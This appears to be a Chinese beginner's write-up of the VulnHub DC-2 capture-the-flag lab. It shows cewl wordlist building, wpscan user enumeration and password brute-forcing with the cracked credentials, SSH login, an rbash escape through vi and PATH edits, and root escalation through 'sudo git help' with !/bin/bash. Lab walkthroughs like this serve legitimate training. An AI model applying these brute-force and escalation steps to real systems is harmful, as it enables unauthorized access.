【Vulnhub】DC-2（新手入门）

链接: VulnHub-DC-2

信息收集

用nmap扫一下，发现开启了两个端口 80和7744，7744是ssh服务

Web探测

访问不了，自动跳转到/dc-2/
解决：直接修改DNS解析
-vim /etc/hosts

flag1就在这里

flag1的提示大概意思就是你通常的字典不管用，要用cewl(还是少用百度翻译吧，压根理解不到)

Cewl是一款采用Ruby开发的应用程序，可以给他的爬虫指定URL地址和爬取深度，还可以添加外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中
输入以下命令之后，爬虫会根据指定的URL和深度进行爬取，然后打印出可用于密码破解的字典：
cewl http://dc-2/
cewl http://dc-2/ -w dict.txt

wpscan枚举用户

wpscan --url http://dc-2/ -e u

用户

admin jerry tom

将用户名放到一个文件里

wpscan --url http://dc-2/ -U user.txt -P dc-2.txt

jerry adipiscing
tom parturient

没爆破出admin，登录上面两个，应该会得到flag2
WordPress默认登录地址是:域名/wp-admin

找到了，提示wordpress没漏洞的话还有别的方法，想一想也就剩个7744端口了，用现有的用户名和密码去连接ssh

权限提升

ssh username@IP -p port

jerry连接不了，能连接tom
但是好像连cat都用不了，大佬说是rbash限制

compgen -c #查看可用命令

能用vi，读flag3.txt

vi flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

提示：su tom jerry
提权，修改环境变量
成功了，换jerry用户，发现好多命令可以用

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

Good to see that you’ve made it this far - but you’re not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you’re on your own now. 😃
Go on - git outta here!!!

git提权??

sudo git help status
#直接输入 !/bin/bash
su root

切换到root目录下最后一个flag，结束

总结

这靶机有点难，每个用户的权限都不一样，rbash绕过，git提权